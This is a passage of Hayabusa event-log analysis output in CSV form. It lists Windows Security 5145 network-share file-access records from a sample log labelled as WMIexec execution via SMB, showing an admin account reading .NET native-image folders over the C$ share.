+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8#\730ce0d11e99c329a9ab7bd75787f1bf | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf#\3d5b722235db7e8a8c7d1344c7221c33 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462#\003de8140f5201b90706bed8c0b34d9a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17#\8b98eff35de01ce97f419f50f85f6123 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment\53494598e1b6d05a1c7e3020cc4e9106 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Design | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Design\52a567b78cdfcd6f0926ba88bd575776 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Device | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Device\7270490235668fa0578aec716a28ce87 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2#\54c0c8fb72275b54709f09380c489b31 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5#\8f83846bacd706e939a5ed0f8b5e3a25 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#\8f81b927dcc93ba9ce82d9b8a45d3ee6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252#\37cc106c66bc77ec23840bde30a2b4ad | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\ddb52221ad0200b7c2e0a308e47d5c7c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\93aa8a60d293a05752aca14646afe6d2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\65b4d38e24dfdd935b19ba1de243c244 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.616 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377#\20e180f5a613fa6fc6d2734676e45df9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff#\c44a74a8e4b895c50ca0a52e97d6428a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\15e0783372e02bd437cab8ac76420124 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8#\f7a43000e540605d6e0e171da4c2f1d4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5#\d72f9f8f53d2cae7691f333739a06f37 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log\dbe5b3f92de7a1dc3900640c1907d600 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\4c22f9b9fda7e935d191dafdc77d9b1f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb#\f16e228634f247a35562db6ee33649f3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Management\d1e6b39e15536aaa5fb9b1cacf8b18aa | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging\0a331cd9fc9df7d44e898baf51e9e09e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net\61ed18221f09c6ff1b6071ff5a269d08 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8#\4a545096f3372d1b7307ee8849058910 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\5ba9e9e2d2253e30f3f28e12016e441d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
